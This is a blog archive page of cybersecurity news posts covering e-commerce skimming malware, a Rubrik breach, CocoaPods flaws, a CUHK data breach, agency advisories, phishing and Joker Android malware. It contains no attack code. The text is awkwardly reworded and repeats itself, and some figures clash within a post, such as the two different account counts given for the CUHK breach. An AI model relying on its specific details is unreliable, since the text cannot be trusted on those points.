Search This Blog
Powered by Blogger.

Blog Archive

Labels

About Me

Load More
Trendy Right Now

Popular Posts

Showing posts with label Security Alert. Show all posts
Security Alert
Adobe Commerce and Magento CMS CyberCrime CyberThreat E-Commerce malware Security Alert

Security Alert as Malware Campaign Hits Widely Used E-commerce CMS



It has been discovered that a malicious program has been launched, posing a serious threat to thousands of online retailers worldwide, as it exploits vulnerabilities in widely used content management systems. According to security researchers, the attack primarily targets platforms that utilise open-source e-commerce CMS frameworks, such as Magento and WooCommerce, by injecting malicious code into the platform and stealing customer data, compromising checkout pages, and gaining administrative control over backend systems. 

In addition to being part of a wider cybercriminal operation, the malware is capable of silently harvesting sensitive information, such as payment details and login credentials, without the user being notified. As a result of this campaign, several online storefronts have already suffered significant losses. Cybersecurity companies, as well as digital commerce platforms, have issued urgent advisories. 

Using outdated plugins, unpatched CMS instances, and misconfigured servers, the attackers have been able to distribute the malware on an unprecedented scale. Due to the fact that e-commerce remains a lucrative target for financially motivated threat actors, this incident highlights the importance of merchants regularly updating their systems, monitoring for abnormal activity, and implementing security best practices in order to ensure that they remain secure. 

The malware campaign signals an urgent need for immediate defence action, with consumer trust and financial transactions at risk. The following sections explain how the attack mechanics work, which platforms are affected, and what mitigations should be taken to prevent this from happening in the future. 

In the ever-evolving cybercrime landscape, e-commerce platforms have become prime targets, with recent studies indicating that 32.4% of successful cyberattacks are directed at online retailers and transaction-based companies. It is no secret that the e-commerce ecosystem is under a growing number of threats, and so is the interest of malicious actors who are continually developing sophisticated methods of exploiting vulnerabilities to gain an edge over their competitors. 

Store administrators, internal employees, as well as unsuspecting customers are all susceptible to the growing range of threats facing the industry. Various attack vectors are being deployed by cybercriminals these days, including phishing attacks, credit card fraud, fake checkout pages, malicious bots, and Distributed Denial of Service (DDoS) attacks, all to disrupt operations, steal sensitive information, and compromise customer trust. 

Businesses that fail to secure their systems adequately not only suffer immediate financial losses but also long-term reputation damage and legal consequences. These threats not only result in immediate financial loss but also cause long-term reputational damage and legal consequences for businesses. It is of utmost importance that businesses take proactive and robust security measures, given that these incidents have never been more prevalent and severe. 

With comprehensive malware removal and prevention solutions from leading cybersecurity companies like Astra Security, businesses are able to detect, neutralise, and recover from breaches of this nature. Attackers are one of the most common ways that they infiltrate ecommerce websites by taking advantage of vulnerabilities within the platform, its infrastructure, or insecure third-party integrations. 

A number of breaches can be attributed to inadequate configuration management, outdated software, and weak security controls among external vendors, which are often a result of an unfortunate combination. In spite of the popularity of high-profile platforms like Magento among online retailers, cybercriminals are also looking to target these platforms—particularly in cases where security patches are delayed or misconfigured—because they present a logical target for them. 

In the past few years, cybercriminals have increasingly exploited known vulnerabilities (CVEs) in e-commerce platforms, with Adobe Magento seeing disproportionate attacks compared to other platforms. It is worth mentioning that CVE-2024-20720 has a critical command injection flaw that was discovered in early 2024, with its CVSS score of 9.1. 

In the exploitation of this vulnerability, attackers were able to execute system commands remotely without the need for user interaction. Cybercriminal groups, such as the notorious Magecart, have exploited the vulnerability for the purposes of implanting persistent backdoors and exfiltrating sensitive customer information. 

There was also the CosmicSting campaign, which exploited a chain of vulnerabilities, CVE-2024-34215 and CVE-2024-2961, which were responsible for affecting more than 75% of Adobe Commerce and Magento installations worldwide. A malicious script injected into a CMS block or CMS block modification enabled remote code execution, the access to critical configuration files (including encryption keys), the escalation of privileges, and long-term control by enabling remote code execution. 

E-commerce platforms must take proactive measures to manage vulnerabilities and monitor real-time threats as a result of CosmicSting's widespread nature and sophistication. There is a disturbing new wave of cyberattacks that specifically target e-commerce websites built on the OpenCart content management system (CMS) and are modelled after Magecart in a Magecart-style attack.

Despite the stealthy and sophisticated execution methods used in this latest incident, cybersecurity experts have been particularly attentive to it. In this attack, malicious JavaScript was injected directly into landing pages by the attackers, which were cleverly disguised by the tags of legitimate third-party marketing and analytics providers such as Google Tag Manager and Meta Pixel. 

When attackers embed malicious code within commonly used tracking snippets, they dramatically reduce their chances of traditional security tools being able to detect them early. Analysts at c/side, a cybersecurity company that specialises in client-side threat monitoring, stated that the script used in this experiment was crafted to mimic the behaviour of a typical tag, but on closer examination, it exhibited suspicious patterns. 

A very deceptive aspect of this campaign is the use of Base64 encoding for obfuscating the payload URLs, which are then routed through suspicious domains like /tagscart.shop/cdn/analytics.min.js, which conceal the script’s true intent from detection during transmission, allowing it to operate undetected in legitimate traffic flows throughout the entire process. 

After the script has been decoded, it generates new HTML elements that are then inserted into the document ahead of the existing scripts in a way that effectively launches secondary malicious payloads in the background. In order to prevent reverse engineering from occurring and to bypass basic security filters, the final stage involves heavily obfuscated JavaScript. 

It utilises techniques such as hexadecimal encoding, array manipulation, and dynamic execution via eval() that are all designed to obfuscate JavaScript. To safeguard e-commerce infrastructures, real-time script monitoring and validation mechanisms are essential to safeguarding them against the sophistication of client-side attacks, which are becoming increasingly sophisticated. 

Nowadays, with the globalisation of the internet, securing an e-commerce website has become a fundamental requirement for anyone who engages in online commerce. Whether it be through a personal website or a full-scale business, security is now an essential part of any online commerce process. 

The costs of not acting can become devastating as malware campaigns become more complex, targeting platforms like Magento, WooCommerce, OpenCart, and others. Leaving a vulnerability unchecked or using an outdated plugin can result in credit card theft, customer data breaches, ransomware, or even a complete loss of control of the site. For businesses, these actions can result in financial losses, reputational damage, legal liabilities, and the loss of customer trust, while for individual entrepreneurs, it can lead to the death of a growing business. 

Through practical, proactive strategies, these threats can be mitigated by performing regular updates and patches, developing strong access controls, integrating secure third parties with the applications, installing web application firewalls (WAFs), scanning continuously for malware, and using real-time monitoring tools. As the threat landscape evolves with each passing year, cybersecurity is not a one-time task, but rather a continuous process. 

The e-commerce industry continues to grow around the world, which means that the question is no longer whether the sit, or a competitor's will be targeted, but when. Investing in robust security measures today means more than just protecting the business; it means you'll be able to survive. Stay informed, stay current, and stay safe.

Read more »
Technology
Authentication Cyber Defence Cyberhackers Cybersecurity Rubrik Security Alert Technology

Security Update from Rubrik as Authentication Keys Are Reissued

 


In a recent report, Rubrik revealed that, last month, an unauthorized security incident compromised one of its log file servers. Rubrik has taken immediate and proactive steps to mitigate potential risks in response to this breach. As part of its remediation efforts, Rubrik has begun rotating all exposed authentication keys, which are designed to prevent potential malicious actors from exploiting these keys. 

A precautionary measure is taken by the company as a precaution to safeguard its systems and make sure that unauthorized entities cannot use the compromised credentials to gain access to the systems. As a part of its efforts to enhance its resilience against future threats, the company is actively assessing its security posture in an attempt to maintain the highest cybersecurity standards. 

This corrective action will reinforce Rubrik's commitment to protecting its infrastructure and safeguarding the integrity of its data security framework by enabling it to implement these corrective actions swiftly. 

Rubrik’s Growth, Financial Success, and Security Measures 


The company was founded in 2014 as a backup and recovery provider but has since grown into a leading security and data protection company. In the fourth quarter of Rubrik's fiscal year, ending October 31, 2024, the company raised $725 million from its initial public offering. In this quarter, Rubrik reported revenues of $236.2 million, which indicated strong market growth, which was a key indicator of Rubrik's growth. 

A security breach in Rubrik occurred in 2023 when a zero-day vulnerability (CVE-2023-0669) in Fortra's GoAnywhere MFT software gave threat actors access to Rubrik's non-production testing environment, allowing them to access Rubrik's non-production IT testing environment. While the Cl0p ransomware group has taken responsibility for this, Rubrik continues to strengthen its cybersecurity framework, which ensures that customer data is protected and that threats are mitigated at an early stage, resulting in an ongoing cybersecurity framework. 

With the launch of advanced innovations, Rubrik has made a major contribution to strengthening the cyber resilience of cloud-based, SaaS, and on-premises environments. Continuing its commitment to strengthening cyber resilience, Rubrik (NYSE: RBRK) has unveiled a series of groundbreaking innovations designed to enhance data security across several cloud, software-as-a-service (SaaS), and on-premises infrastructures. 

In addition to these enhancements, there are enhancements specifically designed to empower organizations with higher levels of capability in anticipating security breaches, identifying emerging threats, and enacting rapid, efficient recovery, regardless of where the data is located. 

As part of Rubrik's annual Cyber Resilience Summit on March 5, this company will unveil its advanced data protection solutions that are set for release during the event. This will be the first time industry leaders and cybersecurity professionals will be able to gain insight into the company's latest advances in data protection technology. 

Rubrik’s Global Presence and Industry Impact 


In the field of cybersecurity, Rubrik is a world-class company that offers backup, recovery, and data protection services. The company has established itself as a trusted partner for businesses throughout the world thanks to its strong team of more than 3,000 people. With more than 22 global offices, the organization provides cutting-edge solutions to a variety of businesses. 

With over 6,000 clients, Rubrik serves a diverse array of companies and institutions across the globe, including leading global corporations such as AMD, Adobe, PepsiCo, Home Depot, Allstate, Sephora, GSK, Honda, Harvard University, and TrelliX, among others. In an increasingly digital landscape, Rubrik is constantly innovating and expanding its security capabilities, which strengthens the company's mission of providing robust, scalable, and intelligent cybersecurity solutions. 

Rubrik Investigates Security Incident Involving Log Server Compromise 


Earlier this week, Rubrik published a security alert detailing the discovery of unusual activity on a server that stored log files. According to Rubrik's Information Security Team, the incident was first identified by cybersecurity expert Kevin Beaumont, who first reported the findings to Rubrik. As soon as the team at Rubrik detected abnormal behavior on the affected server, it immediately took it offline to eliminate any potential risks that could have occurred. 

The investigation conducted by an independent forensic cybersecurity firm, in collaboration with a forensic investigator, has revealed that the event was limited to this single server. A company spokesperson confirmed that no evidence of unauthorized access to customer data or internal code by anyone was found.

Precautionary Measures and Security Enhancements 


While Rubrik admits that the breach was confined to its log server, some log files contained access information even though Rubrik's log server was the only point of vulnerability. The company appears to be taking proactive steps to protect its system against unauthorized access, such as rotating authentication keys. However, it remains unclear how the server was compromised and what information about access has been revealed. 

Cybersecurity Dive received a further reply from Rubrik, and the company responded that, at this time, there is no indication that the information exposed has been exploited. Furthermore, it has been discovered that no signs of threat actors gaining access to Rubrik's internal development environment or customer data have been identified during the ongoing investigation.

Past Security Incidents


Several years ago, Rubrik was one of the organizations affected by the Fortra GoAnywhere vulnerability in 2023, a large-scale data breach orchestrated by the Clop ransomware group. This is not the first time Rubrik has been the target of a security event. Fortra's managed file transfer software was exposed to a zero-day vulnerability during that attack, which resulted in data theft by multiple enterprises, including Rubrik, due to a zero-day vulnerability. 

While these incidents have occurred, the company continues to implement robust security measures to ensure its cyber resilience as well as ensure that its infrastructure is protected against evolving threats in the future. 

Rubrik Unveils Advanced Data Protection and Security Enhancements 


With a range of cutting-edge innovations, Rubrik offers unmatched security, resilience, and cyber threat mitigation capabilities for the protection of critical data: 

Cloud Posture Risk Management (CPR) is an automated service for discovering, inventorying, and protecting cloud data assets based on their cloud standards. 

Cloud Protection for Oracle: Enhances Rubrik Security Cloud (RSC) capability to help safeguard the Oracle Cloud Infrastructure (OCI) databases and the Oracle Cloud VMware Solution (OCVS) databases. 

The PostgreSQL Data Protection solution helps to protect data in one of the most widely used open-source databases through robust backup security. 

The Red Hat OpenShift Back Up service provides immutable, automated backups for environments running on the Kubernetes container engine. 

A great way to back up CI/CD environments with Azure DevOps and GitHub Backup is to use Resilient Backup & GitHub Backup. 

RCV (Rubrik Cloud Vault) for Amazon Web Services: Provides air-gapped, encrypted, as well as policy-driven preservation of files. 

Data protection is strengthened by Microsoft Dynamics 365 Security - protecting data both within the organization and from customers. 

Using Salesforce Sandbox Seeding ensures that data migration from live application environments to sandboxes is efficient and error-free. 

Recovering the identity of an individual is quick, easy and malware-free thanks to Active Directory Recovery (AD) and Entra ID recovery. 

An advanced security solution for Azure & AWS that combines anomaly detection, data classification, and threat monitoring for the most specific threats.

'Turbo Threat Hunting': Delivers a rapid malware free recovery, scanning 75,000 backup files in just 60 seconds to ensure data remains safe. 
Introducing Microsoft 365 Enterprise Edition, which offers Sensitive Data Discovery, Prioritized Recovery, and Threat Intelligence tools. 

These enhancements further reinforce Rubrik's commitment to supporting proactive cyber resilience by providing secure data protection. Rubrik's proactive responses to security incidents and ongoing research in data protection also reinforce this commitment. 

A company's ability to quickly address vulnerabilities and introduce advanced security solutions sets new standards for threat detection, rapid recovery, and intelligent data protection. As cyber threats continue to evolve, organizations must prioritize strong security strategies using cutting-edge technology such as Turbo Threat Hunting and Identity Recovery to ensure their customers are protected from threats. 

It is Rubrik's steadfast commitment to safeguarding enterprise data that enables businesses to navigate digital challenges with a degree of confidence, agility, and resilience that sets it apart.
Read more »
Technology
CocoaPods Critical Bugs iOS Security Alert Technology

CocoaPods Security Alert: Critical Bugs Expose Millions of Apps


A recent security analysis discovered critical vulnerabilities in CocoaPods, the widely used dependency management platform for Apple developers. These vulnerabilities pose significant risks to iOS and macOS apps, potentially allowing attackers to compromise user data and system integrity.

Apple CocoaPods Bugs Expose Millions of Apps to Code Injection

CocoaPods is a platform allowing Apple developers to add and manage other libraries (called "pods"). It has 100,000+ libraries that are utilized by over three million apps, including the most popular worldwide. 

A brief scan of its website finds bundles for Instagram, X, Slack, AirBnB, Tinder, and Uber, to name a few. This makes the pods excellent targets for hackers, and the CocoaPods platform, if it contains an underlying, platform-wide vulnerability, a veritable money pit.

According to research released recently by E.V.A Information Security, the CocoaPods platform has a trio of significant vulnerabilities. The most serious of them, CVE-2024-38366, a remote code execution (RCE) opportunity, received a critical 10 out of 10 CVSS rating. CVE-2024-38368, another notable fault caused by pods without owners, received a critical 9.3, while CVE-2024-38367, a session verification hijacking vulnerability, received an 8.2 rating.

1. Remote Code Execution (CVE-2024-38366)

A severe flaw in CocoaPods enabled attackers to inject malicious code into app builds during the dependency resolution process. The impact: Apps relying on compromised dependencies could execute arbitrary code, leading to serious security breaches.

2. Unowned Pods (CVE-2024-38368)

Some CocoaPods lacked proper ownership, making them susceptible to unauthorized modifications. The risk- Attackers could replace legitimate pods with malicious versions, compromising app functionality and user trust.

3. Session Verification Hijacking (CVE-2024-38367)

CocoaPods failed to adequately verify session tokens during package installation. The consequence? Apps unintentionally using compromised libraries could suffer security breaches.

How to Stay Safe?

Regular Dependency Updates

  • Developers must consistently update their CocoaPods dependencies to receive security patches promptly.
  • Tools like pod outdated help identify outdated libraries.

Ownership Verification

  • Before integrating third-party pods, verify their ownership and integrity.
  • Consider using signed pods or checksums to ensure authenticity.

Code Signing and Notarization

  • Code signing ensures that only trusted code runs on users’ devices.
  • Apple’s notarization process adds an extra layer of security by verifying app binaries.

Finding Exploit A Long Shot

There is no convincing evidence that attackers exploited any of the vulnerabilities discovered by the researchers and patched by CocoaPods in October.

It's worth mentioning, however, that the easily concealable nature of software supply chain flaws, along with the enormous number of pods at danger for so long, would provide adequate cover for anyone who did.

Finding a CocoaPods exploit during the last decade would appear to be simple, but this has not been the case. Instead, E.V.A. suggests that all developers of apps that relied on pods prior to last October (i.e., almost all Apple apps) take six remedial steps, including checking for orphaned pods and extensively evaluating all third-party code dependencies.
Read more »
Security Alert
CUHK Cyberattacks CyberCrime Cyberhackers Cybersecurity CyberThreat Data Breach Security Alert

Major Data Breach at CUHK Affects Over 20,000 Students and Staff

 


Over 20,000 individuals from the Chinese University of Hong Kong (CUHK) were impacted by a data breach at one of the institution's schools in the city that resulted in their personal information being stolen. This is just the latest in a string of data breaches in this city. According to a statement released by the School of Continuing and Professional Studies (CUSCS) on Thursday, the server of an online learning system that the school uses was hacked on June 3. A statement was released by the School of Continuing and Professional Studies (CUSCS) on Thursday notifying us that the server for an online learning system they use has been hacked, as announced by the school. 

There were 20,870 Moodle accounts involved in the study, including employees, part-time tutors, students, graduates and some visitors, who provided names, email addresses and student numbers. As a result of the three unsuccessful login attempts, the college stated that it had deactivated the related account, reset the password, moved the online learning platform away from the responsible server, and strengthened security measures to block the account. 

There was a hacking attack on the school's name and email address, but an investigation by cybersecurity professionals showed that their information had not been leaked to any public websites or dark websites. It has been reported to the police and the Office of the Privacy Commissioner for Personal Data (PCPD), the city’s privacy watchdog, that the incident happened. A report sent by CUHK on Wednesday and a complaint regarding the data breach were received by the PCPD on Thursday. 

Moodle is an open-source learning management system that allows teachers, administrators, and students to create individualized learning environments for online projects in schools, colleges and workplaces. The PCPD has said that they received a report and complaint regarding the data breach on Thursday. A custom website can be created with Moodle containing an online course as well as community-sourced plugins that can be added to the website as well. 

In addition to establishing a crisis management team containing the dean, deputy dean, director of information technology services, director of administration, and director of communications and public relations, the college has established a crisis management team to assess the risks that may arise. CUSCS said the incident has also been reported to CUHK. It was the responsibility of the college to hire a security consultant who conducted an immediate investigation into the matter and discovered that there were no large amounts of data that had been exposed, and the relevant information was not found on the dark web. 

It has also been reported to the police, as well as to the Office of the Privacy Commissioner for Personal Data (PCPD) for the university, which follows established procedures, to notify them of this incident. There was a complaint received by the PCPD regarding the incident on Thursday, the police department announced. The CUSCS stated that through the leak of data, 22,873 Moodle accounts of tutors, students, graduates, and visitors including their names, emails, and student numbers were compromised. In the recent past, there has been a massive theft of personal information from one of the institution's schools after a server had been breached. 

It was discovered on the dark web domain BreachForums that the breached information was readily available on a dark web domain known as BreachForums despite statements made by the university management that they were unaware of any leaks on public platforms. There was a post on the dark web posted by a Threat Actor (TA) who went by the alias "Valerie," in which she claimed to be a hacker who was willing to sell their data to a buyer. "Approximately 75 per cent of the stolen information was sold to a private party, and the breach was financed in this way by the private party," TA stated.  There was no sharing of the rest of the data. 

Following multiple offers, it was decided to take the initiative and make a public sale." This is the third educational institute in Hong Kong this year to have been struck by a cyber attack as a result of multiple offers. It has been reported that the Hong Kong Institute of Contemporary Culture, Lee Shau Kee School of Creativity, was hit by a ransomware attack in May when data belonging to more than 600 students and faculty members were compromised. 

In April, Union Hospital, a private medical facility, experienced a ransomware attack that compromised its servers and reportedly resulted in operational paralysis. Similarly, in February, the Hong Kong College of Technology faced a ransomware attack, leading to a data breach affecting approximately 8,100 students.
Read more »
Security Risk
Cyber Attacks Cybersecurity Agencies IT Service Security Alert Security Risk

Five Eyes Agencies Warn Managed Service Providers of Cyber Attacks

 

The Five Eyes alliance of cybersecurity authorities from the United States, the United Kingdom, Australia, New Zealand, and Canada last week published a joint advisory warning of threats targeting managed service providers (MSPs) and their customers. 

The advisory recommends customers of MSPs in the member nations on how to guard sensitive details and reassess security posture and contractual agreements with their service providers based on individual risk tolerance. MSPs are a prime target for cybercriminals and nation-state actors–because attacking an MSP can lead to additional downstream victims (as we witnessed with Kaseya and the SolarWinds assaults.)

"As this advisory makes clear, malicious cyber actors continue to target managed service providers, which is why it's critical that MSPs and their customers take recommended actions to protect their networks," Jen Easterly, director of US's Cybersecurity and Infrastructure Security Agency (CISA) stated. 

"We know that MSPs that are vulnerable to exploitation significantly increase downstream risks to the businesses and organizations they support. Securing MSPs are critical to our collective cyber defense, and CISA and our interagency and international partners are committed to hardening their security and improving the resilience of our global supply chain," she added. 

The alert is the result of a collaborative effort among the Cybersecurity and Infrastructure Security Agency, the National Security Agency, and the Federal Bureau of Investigation in the U.S.; the National Cyber Security Centers in the United Kingdom and New Zealand; the Australian Cyber Security Center; and the Canadian Center for Cyber Security. 

Mitigation tips 

In the advisory issued on the second day of the NCSC's Cyber UK conference, where several senior figures from the cybersecurity agencies have met to discuss the issue of global cyber threats, the authorities recommend that MSP customers ensure that their MSPs implement the following measures and controls: 

• To counter initial assault, enhance the security of vulnerable devices, protect internet-facing services and defend against brute-force and phishing attacks. 
• Improve monitoring and logging processes for the delivery infrastructure activities used to provide services to the customer. 
• Enable multifactor authentication across all customer services and products. 
• Periodically erase obsolete accounts and infrastructure and apply updates to the infrastructure whenever available and necessary. 
• Develop incident response and recovery plans. 
• Understand and proactively manage supply chain risk. 
• Adopt transparent processes and, at the same time, manage account authentication and authorization.
Read more »
War
Cyber Fraud Fraud Fraud Email Hacked Accounts phishing Security Alert Ukraine War

Ukrainian CERT Alerts Citizens of Phishing Attacks Using Hacked Accounts

 

The Computer Emergency Response Team of Ukraine (CERT-UA) has cautioned of new phishing attacks directed at Ukrainian citizens, which use hijacked email accounts belonging to three separate Indian businesses to infiltrate their inboxes and steal sensitive data. 

The emails arrive with the subject line "" (meaning "Attention") and pretend to be from a domestic email service named Ukr.net, but the sender's email address is "muthuprakash.b@tvsrubber[.]com," according to the agency. The messages allegedly alert recipients of an unauthorised attempt to log in to their accounts from an IP address based in Donetsk, Ukraine, and urge them to change their passwords immediately by clicking on a link. 

CERT-UA noted in a Facebook post over the weekend, "After following the link and entering the password, it gets to the attackers. In this way, they gain access to the email inboxes of Ukrainian citizens." 

The fact that TVS Rubber is an automotive company situated in the Indian city of Madurai suggests that the phishing emails were distributed through an already compromised email account. In a further update, CERT-UA stated that it had discovered an additional 20 email addresses used in the attacks, some of which belonged to sysadmins and faculty members at the Ramaiah University of Applied Sciences, an academic institution in Bengaluru, India. 

An email address from Hodek Vibration Technologies Pvt. Ltd., an India-based automotive company that designs and manufactures dampers for cars, light and heavy commercial vehicles, and other industrial equipment, is also featured in the list. 

"All these mailboxes have been compromised and are being used by the Russian Federation's special services to carry out cyberattacks on Ukrainian citizens," the agency said. 

The news comes as NATO states unanimously approved to admit Ukraine as a "Contributing Participant" to the Cooperative Cyber Defence Centre of Excellence (CCDCOE), as Russia's military invasion of the country entered its second week and cyber strikes poured down on government and commercial targets. 

"Ukraine's presence in the Centre will enhance the exchange of cyber expertise, between Ukraine and CCDCOE member nations. Ukraine could bring valuable first-hand knowledge of several adversaries within the cyber domain to be used for research, exercises and training," Col Jaak Tarien, director of CCDCOE, said in a statement.
Read more »
Security Alert
Cyber Data Cyber Security Frauds Phishing scam Scam SEC Security Alert

US SEC Alerts Investors of Ongoing Fraud

 

The Securities and Exchange Commission (SEC) is alerting investors about scammers posing as SEC officials and attempting to mislead them. 

Fraudsters are contacting investors via phone calls, voicemails, emаils, and letters, according to the SEC's Office of Investor Educаtion and Advocаcy (OIE). 

The alert stated, “We аre аwаre thаt severаl individuаls recently received phone cаlls or voicemаil messаges thаt аppeаred to be from аn SEC phone number. The cаlls аnd messаges rаised purported concerns аbout unаuthorized trаnsаctions or other suspicious аctivity in the recipients’ checking or cryptocurrency аccounts. These phone cаlls аnd voicemаil messаges аre in no wаy connected to the Securities аnd Exchаnge Commission.” 

The SEC warned it never asks for payments linked to enforcement activities, offer to confirm trades, or seek sensitive personal and financial information in unsolicited communication, including emails and letters. It further stated that SEC officials will not inquire about shareholdings, account numbers, PINs, passwords, or other personal information. 

Scammers appear to be employing a growing number of strategies in order to boost their chances of success. Investors should not disclose any personal information if they get communication that seems to be from the Securities and Exchange Commission, as per the notice. They are encouraged to contact the commission directly.

Investors can use the SEC's personnel locаtor at (202) 551-6000, call (800) SEC-0330, or emаil help@SEC.gov to confirm the identity of people behind calls or messages. Investors can also register a complaint with the Securities and Exchange Commission's Office of Inspector General by visiting www.sec.gov/oig or calling (833) SEC-OIG1 (732-6441). 

Further, the alert stated, “Bewаre of government impersonаtor schemes. Con аrtists hаve used the nаmes of reаl SEC employees аnd emаil messаges thаt fаlsely аppeаr to be from the Securities аnd Exchаnge Commission to trick victims into sending the frаudster’s money. Impersonаtion of US Government аgencies аnd employees (аs well аs of legitimаte finаnciаl services entities) is one common feаture of аdvаnce fee solicitаtions аnd other frаudulent schemes. Even where the frаudsters do not request thаt funds be sent directly to them, they mаy use personаl informаtion they obtаin to steаl аn individuаl’s identity or misаppropriаte their finаnciаl аssets.”
Read more »
Security Alert
Android Malware Android Users Joker malware malware Security Alert

Joker Malware Targeting Android Users Again

 

Recently Joker virus has been discovered in a few Google Play Store apps. The malware infiltrates a user's device through applications, collects data, and then subscribes these users to premium memberships without the individual's consent or agreement. 

Since three years, the Joker Trojan malware has been discovered in Google Play Store apps. In July 2020, the Joker virus infected over 40 Android apps available on Google Play Store, forcing Google to remove the compromised apps from the Play Store. Users' data is stolen, including SMS, contact lists, device information, OTPs, and other major data.

Quick Heal Security Labs recently discovered 8 Joker malware on the Google Play Store. These eight apps were reported to Google, and the company has since deleted them all from its store. 

The following are the eight apps that have recently been discovered to be infected with the Joker Trojan virus and should be deleted from any Android device: 
-Auxiliary Message 
-Fast Magic SMS 
-Free CamScanner 
-Super Message 
-Element Scanner 
-Go Messages 
-Travel Wallpapers 
-Super SMS 

Through SMS messages, contact lists, and device information, the Joker Trojan collects information from the victim's device. The Trojan then interacts discreetly with advertising websites and, without the victim's knowledge, subscribes them to premium services. 

According to the Quick Heal report, these applications request notification access at launch, which is then utilised to obtain notification data. After that, the programme takes SMS data from the notification and requests Contacts access. When permission is granted, the app makes and manages phone calls. Afterwards, it keeps working without displaying any suspicious attacks to the user. 

“Joker is one of the most prominent malware families that continually targets Android devices. Despite awareness of this particular malware, it keeps finding its way into Google’s official application market by employing changes in its code, execution methods, or payload-retrieving techniques. This spyware is designed to steal SMS messages, contact lists, and device information along with silently signing up the victim for premium wireless application protocol (WAP) services,” Zcaler stated in a blog post.
Read more »
Subscribe to: Posts (Atom)